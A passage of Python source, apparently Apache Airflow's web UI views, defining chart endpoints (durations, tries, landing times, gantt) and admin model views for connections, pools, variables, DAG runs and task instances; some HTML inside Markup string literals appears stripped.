session.query(TF)\n .filter(TF.dag_id == dag.dag_id,\n TF.execution_date >= min_date,\n TF.execution_date <= base_date,\n TF.task_id.in_([t.task_id for t in dag.tasks]))\n .all() # noqa\n )\n\n fails_totals = defaultdict(int)\n for tf in ti_fails:\n dict_key = (tf.dag_id, tf.task_id, tf.execution_date)\n if tf.duration:\n fails_totals[dict_key] += tf.duration\n\n for ti in tis:\n if ti.duration:\n dttm = wwwutils.epoch(ti.execution_date)\n x[ti.task_id].append(dttm)\n y[ti.task_id].append(float(ti.duration))\n fails_dict_key = (ti.dag_id, ti.task_id, ti.execution_date)\n fails_total = fails_totals[fails_dict_key]\n cum_y[ti.task_id].append(float(ti.duration + 
fails_total))\n\n # determine the most relevant time unit for the set of task instance\n # durations for the DAG\n y_unit = infer_time_unit([d for t in y.values() for d in t])\n cum_y_unit = infer_time_unit([d for t in cum_y.values() for d in t])\n # update the y Axis on both charts to have the correct time units\n chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Duration ({})'.format(y_unit))\n chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n cum_chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Duration ({})'.format(cum_y_unit))\n cum_chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n\n for task in dag.tasks:\n if x[task.task_id]:\n chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(y[task.task_id], y_unit))\n cum_chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(cum_y[task.task_id],\n cum_y_unit))\n\n dates = sorted(list({ti.execution_date for ti in tis}))\n max_date = max([ti.execution_date for ti in tis]) if dates else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n chart.buildcontent()\n cum_chart.buildcontent()\n s_index = cum_chart.htmlcontent.rfind('});')\n cum_chart.htmlcontent = (cum_chart.htmlcontent[:s_index] +\n \"$( document ).trigger('chartload')\" +\n cum_chart.htmlcontent[s_index:])\n\n return self.render_template(\n 'airflow/duration_chart.html',\n dag=dag,\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n chart=chart.htmlcontent,\n cum_chart=cum_chart.htmlcontent\n )\n\n @expose('/tries')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def tries(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, y_axis_format='d', height=chart_height,\n width=\"1200\")\n\n for task in dag.tasks:\n y = []\n x = []\n for ti in task.get_task_instances(start_date=min_date, end_date=base_date):\n dttm = wwwutils.epoch(ti.execution_date)\n x.append(dttm)\n # y value should reflect completed tries to have a 0 baseline.\n y.append(ti.prev_attempted_tries)\n if x:\n chart.add_serie(name=task.task_id, x=x, y=y)\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n tries = sorted(list({ti.try_number for ti in tis}))\n max_date = max([ti.execution_date for ti in tis]) if tries else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n\n chart.buildcontent()\n\n return self.render_template(\n 'airflow/chart.html',\n dag=dag,\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n chart=chart.htmlcontent,\n tab_title='Tries',\n )\n\n @expose('/landing_times')\n 
@has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def landing_times(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n y = {}\n x = {}\n for task in dag.tasks:\n task_id = task.task_id\n y[task_id] = []\n x[task_id] = []\n for ti in task.get_task_instances(start_date=min_date, end_date=base_date):\n ts = ti.execution_date\n if dag.schedule_interval and dag.following_schedule(ts):\n ts = dag.following_schedule(ts)\n if ti.end_date:\n dttm = wwwutils.epoch(ti.execution_date)\n secs = (ti.end_date - ts).total_seconds()\n x[task_id].append(dttm)\n y[task_id].append(secs)\n\n # determine the most relevant time unit for the set of landing times\n # for the DAG\n y_unit = infer_time_unit([d for t in y.values() for d in t])\n # update the y Axis to have the correct time units\n chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Landing Time ({})'.format(y_unit))\n chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n for task in dag.tasks:\n if x[task.task_id]:\n chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(y[task.task_id], y_unit))\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n dates = sorted(list({ti.execution_date for ti in tis}))\n max_date = max([ti.execution_date for ti in tis]) if dates else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n chart.buildcontent()\n return self.render_template(\n 'airflow/chart.html',\n dag=dag,\n chart=chart.htmlcontent,\n height=str(chart_height + 100) + \"px\",\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n tab_title='Landing times',\n )\n\n @expose('/paused', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def paused(self):\n dag_id = request.args.get('dag_id')\n is_paused = True if request.args.get('is_paused') == 'false' else False\n models.DagModel.get_dagmodel(dag_id).set_is_paused(\n is_paused=is_paused)\n return \"OK\"\n\n @expose('/refresh', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n @provide_session\n def refresh(self, session=None):\n DagModel = models.DagModel\n dag_id = request.values.get('dag_id')\n orm_dag = session.query(\n DagModel).filter(DagModel.dag_id == dag_id).first()\n\n if orm_dag:\n orm_dag.last_expired = timezone.utcnow()\n session.merge(orm_dag)\n session.commit()\n\n dag = dagbag.get_dag(dag_id)\n # sync dag permission\n appbuilder.sm.sync_perm_for_dag(dag_id, dag.access_control)\n\n flash(\"DAG [{}] is now fresh as a daisy\".format(dag_id))\n return redirect(request.referrer)\n\n @expose('/gantt')\n 
@has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def gantt(self, session=None):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n demo_mode = conf.getboolean('webserver', 'demo_mode')\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n dt_nr_dr_data = get_date_time_num_runs_dag_runs_form_data(request, session, dag)\n dttm = dt_nr_dr_data['dttm']\n\n form = DateTimeWithNumRunsWithDagRunsForm(data=dt_nr_dr_data)\n form.execution_date.choices = dt_nr_dr_data['dr_choices']\n\n tis = [\n ti for ti in dag.get_task_instances(dttm, dttm)\n if ti.start_date and ti.state]\n tis = sorted(tis, key=lambda ti: ti.start_date)\n TF = TaskFail\n ti_fails = list(itertools.chain(*[(\n session\n .query(TF)\n .filter(TF.dag_id == ti.dag_id,\n TF.task_id == ti.task_id,\n TF.execution_date == ti.execution_date)\n .all()\n ) for ti in tis]))\n\n # determine bars to show in the gantt chart\n gantt_bar_items = []\n\n tasks = []\n for ti in tis:\n end_date = ti.end_date or timezone.utcnow()\n # prev_attempted_tries will reflect the currently running try_number\n # or the try_number of the last complete run\n # https://issues.apache.org/jira/browse/AIRFLOW-2143\n try_count = ti.prev_attempted_tries\n gantt_bar_items.append((ti.task_id, ti.start_date, end_date, ti.state, try_count))\n d = alchemy_to_dict(ti)\n d['extraLinks'] = dag.get_task(ti.task_id).extra_links\n tasks.append(d)\n\n tf_count = 0\n try_count = 1\n prev_task_id = \"\"\n for tf in ti_fails:\n end_date = tf.end_date or timezone.utcnow()\n start_date = tf.start_date or end_date\n if tf_count != 0 and tf.task_id == prev_task_id:\n try_count = try_count + 1\n else:\n try_count = 1\n prev_task_id = tf.task_id\n gantt_bar_items.append((tf.task_id, start_date, end_date, State.FAILED, try_count))\n tf_count = tf_count + 1\n task = dag.get_task(tf.task_id)\n d = alchemy_to_dict(tf)\n d['state'] = State.FAILED\n d['operator'] = task.task_type\n d['try_number'] = try_count\n d['extraLinks'] = task.extra_links\n tasks.append(d)\n\n data = {\n 'taskNames': [ti.task_id for ti in tis],\n 'tasks': tasks,\n 'height': len(tis) * 25 + 25,\n }\n\n session.commit()\n\n return self.render_template(\n 'airflow/gantt.html',\n dag=dag,\n execution_date=dttm.isoformat(),\n form=form,\n data=data,\n base_date='',\n demo_mode=demo_mode,\n root=root,\n )\n\n @expose('/extra_links')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def extra_links(self):\n \"\"\"\n A restful endpoint that returns external links for a given Operator\n\n It queries the operator that sent the request for the links it wishes\n to provide for a given external link name.\n\n API: GET\n Args: dag_id: The id of the dag containing the task in question\n task_id: The id of the task in question\n execution_date: The date of execution of the task\n link_name: The name of the link reference to find the actual URL for\n\n Returns:\n 200: {url: , error: None} - returned when there was no problem\n finding the URL\n 404: {url: None, error: } - returned when the operator does\n not return a URL\n \"\"\"\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n link_name = request.args.get('link_name')\n dttm = timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag or task_id not in dag.task_ids:\n response = jsonify(\n {'url': None,\n 'error': 
\"can't find dag {dag} or task_id {task_id}\".format(\n dag=dag,\n task_id=task_id\n )}\n )\n response.status_code = 404\n return response\n\n task = dag.get_task(task_id)\n\n try:\n url = task.get_extra_links(dttm, link_name)\n except ValueError as err:\n response = jsonify({'url': None, 'error': str(err)})\n response.status_code = 404\n return response\n if url:\n response = jsonify({'error': None, 'url': url})\n response.status_code = 200\n return response\n else:\n response = jsonify(\n {'url': None, 'error': 'No URL found for {dest}'.format(dest=link_name)})\n response.status_code = 404\n return response\n\n @expose('/object/task_instances')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def task_instances(self):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n\n dttm = request.args.get('execution_date')\n if dttm:\n dttm = timezone.parse(dttm)\n else:\n return \"Error: Invalid execution_date\"\n\n task_instances = {\n ti.task_id: alchemy_to_dict(ti)\n for ti in dag.get_task_instances(dttm, dttm)}\n\n return json.dumps(task_instances)\n\n\nclass VersionView(AirflowBaseView):\n default_view = 'version'\n\n @expose('/version')\n @has_access\n def version(self):\n try:\n airflow_version = airflow.__version__\n except Exception as e:\n airflow_version = None\n logging.error(e)\n\n # Get the Git repo and git hash\n git_version = None\n try:\n git_version = str(pkgutil.get_data('airflow', 'git_version'), encoding=\"UTF-8\")\n except Exception as e:\n logging.error(e)\n\n # Render information\n title = \"Version Info\"\n return self.render_template(\n 'airflow/version.html',\n title=title,\n airflow_version=airflow_version,\n git_version=git_version)\n\n\nclass ConfigurationView(AirflowBaseView):\n default_view = 'conf'\n\n @expose('/configuration')\n @has_access\n def conf(self):\n raw = request.args.get('raw') == \"true\"\n title = \"Airflow Configuration\"\n subtitle = AIRFLOW_CONFIG\n # Don't show config when expose_config variable is False in airflow config\n if conf.getboolean(\"webserver\", \"expose_config\"):\n with open(AIRFLOW_CONFIG, 'r') as file:\n config = file.read()\n table = [(section, key, value, source)\n for section, parameters in conf.as_dict(True, True).items()\n for key, (value, source) in parameters.items()]\n else:\n config = (\n \"# Your Airflow administrator chose not to expose the \"\n \"configuration, most likely for security reasons.\")\n table = None\n\n if raw:\n return Response(\n response=config,\n status=200,\n mimetype=\"application/text\")\n else:\n code_html = Markup(highlight(\n config,\n lexers.IniLexer(), # Lexer call\n HtmlFormatter(noclasses=True))\n )\n return self.render_template(\n 'airflow/config.html',\n pre_subtitle=settings.HEADER + \" v\" + airflow.__version__,\n code_html=code_html, title=title, subtitle=subtitle,\n table=table)\n\n\n######################################################################################\n# ModelViews\n######################################################################################\n\nclass DagFilter(BaseFilter):\n def apply(self, query, func): # noqa\n if appbuilder.sm.has_all_dags_access():\n return query\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n return query.filter(self.model.dag_id.in_(filter_dag_ids))\n\n\nclass AirflowModelView(ModelView):\n list_widget = AirflowModelListWidget\n page_size = PAGE_SIZE\n\n CustomSQLAInterface = wwwutils.CustomSQLAInterface\n\n\nclass SlaMissModelView(AirflowModelView):\n route_base = '/slamiss'\n\n 
datamodel = AirflowModelView.CustomSQLAInterface(SlaMiss)\n\n base_permissions = ['can_list']\n\n list_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n add_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n edit_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n search_columns = ['dag_id', 'task_id', 'email_sent', 'timestamp', 'execution_date']\n base_order = ('execution_date', 'desc')\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'task_id': wwwutils.task_instance_link,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'timestamp': wwwutils.datetime_f('timestamp'),\n 'dag_id': wwwutils.dag_link,\n }\n\n\nclass XComModelView(AirflowModelView):\n route_base = '/xcom'\n\n datamodel = AirflowModelView.CustomSQLAInterface(XCom)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n search_columns = ['key', 'value', 'timestamp', 'execution_date', 'task_id', 'dag_id']\n list_columns = ['key', 'value', 'timestamp', 'execution_date', 'task_id', 'dag_id']\n add_columns = ['key', 'value', 'execution_date', 'task_id', 'dag_id']\n edit_columns = ['key', 'value', 'execution_date', 'task_id', 'dag_id']\n base_order = ('execution_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'task_id': wwwutils.task_instance_link,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'timestamp': wwwutils.datetime_f('timestamp'),\n 'dag_id': wwwutils.dag_link,\n }\n\n @action('muldelete', 'Delete', \"Are you sure you want to delete selected records?\",\n single=False)\n def action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def pre_add(self, item):\n item.execution_date = timezone.make_aware(item.execution_date)\n item.value = XCom.serialize_value(item.value)\n\n def pre_update(self, item):\n item.execution_date = timezone.make_aware(item.execution_date)\n item.value = XCom.serialize_value(item.value)\n\n\nclass ConnectionModelView(AirflowModelView):\n route_base = '/connection'\n\n datamodel = AirflowModelView.CustomSQLAInterface(Connection)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n extra_fields = ['extra__jdbc__drv_path', 'extra__jdbc__drv_clsname',\n 'extra__google_cloud_platform__project',\n 'extra__google_cloud_platform__key_path',\n 'extra__google_cloud_platform__keyfile_dict',\n 'extra__google_cloud_platform__scope',\n 'extra__google_cloud_platform__num_retries',\n 'extra__grpc__auth_type',\n 'extra__grpc__credential_pem_file',\n 'extra__grpc__scopes',\n 'extra__yandexcloud__service_account_json',\n 'extra__yandexcloud__service_account_json_path',\n 'extra__yandexcloud__oauth',\n 'extra__yandexcloud__public_ssh_key',\n 'extra__yandexcloud__folder_id',\n 'extra__kubernetes__in_cluster',\n 'extra__kubernetes__kube_config',\n 'extra__kubernetes__namespace']\n list_columns = ['conn_id', 'conn_type', 'host', 'port', 'is_encrypted',\n 'is_extra_encrypted']\n add_columns = edit_columns = ['conn_id', 'conn_type', 'host', 'schema',\n 'login', 'password', 'port', 'extra'] + extra_fields\n add_form = edit_form = ConnectionForm\n add_template = 'airflow/conn_create.html'\n edit_template = 'airflow/conn_edit.html'\n\n base_order = ('conn_id', 'asc')\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n @has_dag_access(can_dag_edit=True)\n def 
action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def process_form(self, form, is_created):\n formdata = form.data\n if formdata['conn_type'] in ['jdbc', 'google_cloud_platform', 'grpc', 'yandexcloud', 'kubernetes']:\n extra = {\n key: formdata[key]\n for key in self.extra_fields if key in formdata}\n form.extra.data = json.dumps(extra)\n\n def prefill_form(self, form, pk):\n try:\n d = json.loads(form.data.get('extra', '{}'))\n except Exception:\n d = {}\n\n if not hasattr(d, 'get'):\n logging.warning('extra field for {} is not iterable'.format(\n form.data.get('conn_id', '')))\n return\n\n for field in self.extra_fields:\n value = d.get(field, '')\n if value:\n field = getattr(form, field)\n field.data = value\n\n\nclass PoolModelView(AirflowModelView):\n route_base = '/pool'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.Pool)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n list_columns = ['pool', 'slots', 'running_slots', 'queued_slots']\n add_columns = ['pool', 'slots', 'description']\n edit_columns = ['pool', 'slots', 'description']\n\n base_order = ('pool', 'asc')\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n def action_muldelete(self, items):\n if any(item.pool == models.Pool.DEFAULT_POOL_NAME for item in items):\n flash(\"default_pool cannot be deleted\", 'error')\n self.update_redirect()\n return redirect(self.get_redirect())\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def pool_link(attr):\n pool_id = attr.get('pool')\n if pool_id is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id)\n return Markup(\"{pool_id}\").format(url=url, pool_id=pool_id)\n else:\n return Markup('Invalid')\n\n def frunning_slots(attr):\n pool_id = attr.get('pool')\n running_slots = attr.get('running_slots')\n if pool_id is not None and running_slots is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id, _flt_3_state='running')\n return Markup(\"{running_slots}\").format(url=url, running_slots=running_slots)\n else:\n return Markup('Invalid')\n\n def fqueued_slots(attr):\n pool_id = attr.get('pool')\n queued_slots = attr.get('queued_slots')\n if pool_id is not None and queued_slots is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id, _flt_3_state='queued')\n return Markup(\"{queued_slots}\").format(url=url, queued_slots=queued_slots)\n else:\n return Markup('Invalid')\n\n formatters_columns = {\n 'pool': pool_link,\n 'running_slots': frunning_slots,\n 'queued_slots': fqueued_slots\n }\n\n validators_columns = {\n 'pool': [validators.DataRequired()],\n 'slots': [validators.NumberRange(min=-1)]\n }\n\n\nclass VariableModelView(AirflowModelView):\n route_base = '/variable'\n\n list_template = 'airflow/variable_list.html'\n edit_template = 'airflow/variable_edit.html'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.Variable)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete', 'can_varimport']\n\n list_columns = ['key', 'val', 'is_encrypted']\n add_columns = ['key', 'val']\n edit_columns = ['key', 'val']\n search_columns = ['key', 'val']\n\n base_order = ('key', 'asc')\n\n def hidden_field_formatter(attr):\n key = attr.get('key')\n val = attr.get('val')\n if wwwutils.should_hide_value_for_key(key):\n return Markup('*' * 8)\n if val:\n return val\n else:\n return 
Markup('Invalid')\n\n formatters_columns = {\n 'val': hidden_field_formatter,\n }\n\n validators_columns = {\n 'key': [validators.DataRequired()]\n }\n\n def prefill_form(self, form, id):\n if wwwutils.should_hide_value_for_key(form.key.data):\n form.val.data = '*' * 8\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n def action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('varexport', 'Export', '', single=False)\n def action_varexport(self, items):\n var_dict = {}\n d = json.JSONDecoder()\n for var in items:\n try:\n val = d.decode(var.val)\n except Exception:\n val = var.val\n var_dict[var.key] = val\n\n response = make_response(json.dumps(var_dict, sort_keys=True, indent=4))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=variables.json\"\n response.headers[\"Content-Type\"] = \"application/json; charset=utf-8\"\n return response\n\n @expose('/varimport', methods=[\"POST\"])\n @has_access\n @action_logging\n def varimport(self):\n try:\n out = request.files['file'].read()\n if isinstance(out, bytes):\n d = json.loads(out.decode('utf-8'))\n else:\n d = json.loads(out)\n except Exception:\n self.update_redirect()\n flash(\"Missing file or syntax error.\", 'error')\n return redirect(self.get_redirect())\n else:\n suc_count = fail_count = 0\n for k, v in d.items():\n try:\n models.Variable.set(k, v, serialize_json=not isinstance(v, str))\n except Exception as e:\n logging.info('Variable import failed: {}'.format(repr(e)))\n fail_count += 1\n else:\n suc_count += 1\n flash(\"{} variable(s) successfully updated.\".format(suc_count))\n if fail_count:\n flash(\"{} variable(s) failed to be updated.\".format(fail_count), 'error')\n self.update_redirect()\n return redirect(self.get_redirect())\n\n\nclass JobModelView(AirflowModelView):\n route_base = '/job'\n\n datamodel = AirflowModelView.CustomSQLAInterface(BaseJob)\n\n base_permissions = ['can_list']\n\n list_columns = ['id', 'dag_id', 'state', 'job_type', 'start_date',\n 'end_date', 'latest_heartbeat',\n 'executor_class', 'hostname', 'unixname']\n search_columns = ['id', 'dag_id', 'state', 'job_type', 'start_date',\n 'end_date', 'latest_heartbeat', 'executor_class',\n 'hostname', 'unixname']\n\n base_order = ('start_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'start_date': wwwutils.datetime_f('start_date'),\n 'end_date': wwwutils.datetime_f('end_date'),\n 'hostname': wwwutils.nobr_f('hostname'),\n 'state': wwwutils.state_f,\n 'latest_heartbeat': wwwutils.datetime_f('latest_heartbeat'),\n }\n\n\nclass DagRunModelView(AirflowModelView):\n route_base = '/dagrun'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.DagRun)\n\n base_permissions = ['can_list', 'can_add']\n\n add_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger', 'conf']\n list_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger']\n search_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger']\n\n base_order = ('execution_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n add_form = edit_form = DagRunForm\n\n formatters_columns = {\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'state': wwwutils.state_f,\n 'start_date': wwwutils.datetime_f('start_date'),\n 'dag_id': wwwutils.dag_link,\n 'run_id': wwwutils.dag_run_link,\n }\n\n @action('muldelete', 
\"Delete\", \"Are you sure you want to delete selected records?\",\n single=False)\n @has_dag_access(can_dag_edit=True)\n @provide_session\n def action_muldelete(self, items, session=None):\n self.datamodel.delete_all(items)\n self.update_redirect()\n dirty_ids = []\n for item in items:\n dirty_ids.append(item.dag_id)\n return redirect(self.get_redirect())\n\n @action('set_running', \"Set state to 'running'\", '', single=False)\n @provide_session\n def action_set_running(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n dr.start_date = timezone.utcnow()\n dr.state = State.RUNNING\n session.commit()\n flash(\"{count} dag runs were set to running\".format(count=count))\n except Exception as ex:\n flash(str(ex), 'error')\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n @action('set_failed', \"Set state to 'failed'\",\n \"All running task instances would also be marked as failed, are you sure?\",\n single=False)\n @provide_session\n def action_set_failed(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n altered_tis = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n altered_tis += \\\n set_dag_run_state_to_failed(dagbag.get_dag(dr.dag_id),\n dr.execution_date,\n commit=True,\n session=session)\n altered_ti_count = len(altered_tis)\n flash(\n \"{count} dag runs and {altered_ti_count} task instances \"\n \"were set to failed\".format(count=count, altered_ti_count=altered_ti_count))\n except Exception:\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n @action('set_success', \"Set state to 'success'\",\n \"All task instances would also be marked as success, are you sure?\",\n single=False)\n @provide_session\n def action_set_success(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n altered_tis = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n altered_tis += \\\n set_dag_run_state_to_success(dagbag.get_dag(dr.dag_id),\n dr.execution_date,\n commit=True,\n session=session)\n altered_ti_count = len(altered_tis)\n flash(\n \"{count} dag runs and {altered_ti_count} task instances \"\n \"were set to success\".format(count=count, altered_ti_count=altered_ti_count))\n except Exception:\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n\nclass LogModelView(AirflowModelView):\n route_base = '/log'\n\n datamodel = AirflowModelView.CustomSQLAInterface(Log)\n\n base_permissions = ['can_list']\n\n list_columns = ['id', 'dttm', 'dag_id', 'task_id', 'event', 'execution_date',\n 'owner', 'extra']\n search_columns = ['dag_id', 'task_id', 'event', 'execution_date', 'owner', 'extra']\n\n base_order = ('dttm', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'dttm': wwwutils.datetime_f('dttm'),\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'dag_id': wwwutils.dag_link,\n }\n\n\nclass TaskInstanceModelView(AirflowModelView):\n route_base = '/taskinstance'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.TaskInstance)\n\n base_permissions = ['can_list']\n\n page_size = PAGE_SIZE\n\n list_columns = ['state', 'dag_id', 'task_id', 
'execution_date', 'operator',\n 'start_date', 'end_date', 'duration', 'job_id', 'hostname',\n 'unixname', 'priority_weight', 'queue', 'queued_dttm', 'try_number',\n 'pool', 'log_url']\n\n order_columns = [item for item in list_columns if item not in ['try_number', 'log_url']]\n\n search_columns = ['state', 'dag_id', 'task_id', 'execution_date', 'hostname',\n 'queue', 'pool', 'operator', 'start_date', 'end_date']\n\n base_order = ('job_id', 'asc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n def log_url_formatter(attr):\n log_url = attr.get('log_url')\n return Markup(\n ''\n ' '\n '').format(log_url=log_url)\n\n def duration_f(attr):\n end_date = attr.get('end_date')\n duration = attr.get('duration')\n if end_date and duration:\n return timedelta(seconds=duration)\n\n formatters_columns = {\n 'log_url': log_url_formatter,\n 'task_id': wwwutils.task_instance_link,\n 'hostname': wwwutils.nobr_f('hostname'),\n 'state': wwwutils.state_f,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'start_date': wwwutils.datetime_f('start_date'),\n 'end_date': wwwutils.datetime_f('end_date'),\n 'queued_dttm': wwwutils.datetime_f('queued_dttm'),\n 'dag_id': wwwutils.dag_link,\n 'duration': duration_f,\n }\n\n @provide_session\n @action('clear', lazy_gettext('Clear'),\n lazy_gettext('Are you sure you want to clear the state of the selected task'\n ' instance(s) and set their dagruns to the running state?'),\n single=False)\n def action_clear(self, tis, session=None):\n try:\n dag_to_tis = {}\n\n for ti in tis:\n dag = dagbag.get_dag(ti.dag_id)\n tis = dag_to_tis.setdefault(dag, [])\n tis.append(ti)\n\n for dag, tis in dag_to_tis.items():\n models.clear_task_instances(tis, session, dag=dag)\n\n session.commit()\n flash(\"{0} task instances have been cleared\".format(len(tis)))\n self.update_redirect()\n return redirect(self.get_redirect())\n\n except Exception:\n flash('Failed to clear task instances', 'error')\n\n @provide_session\n def set_task_instance_state(self, tis, target_state, session=None):\n try:\n count = len(tis)\n for ti in tis:\n ti.set_state(target_state, session)\n session.commit()\n flash(\"{count} task instances were set to '{target_state}'\".format(\n count=count, target_state=target_state))\n except Exception:\n flash('Failed to set state', 'error')\n\n @action('set_running', \"Set state to 'running'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_running(self, tis):\n self.set_task_instance_state(tis, State.RUNNING)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_failed', \"Set state to 'failed'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_failed(self, tis):\n self.set_task_instance_state(tis, State.FAILED)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_success', \"Set state to 'success'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_success(self, tis):\n self.set_task_instance_state(tis, State.SUCCESS)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_retry', \"Set state to 'up_for_retry'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_retry(self, tis):\n self.set_task_instance_state(tis, State.UP_FOR_RETRY)\n self.update_redirect()\n return 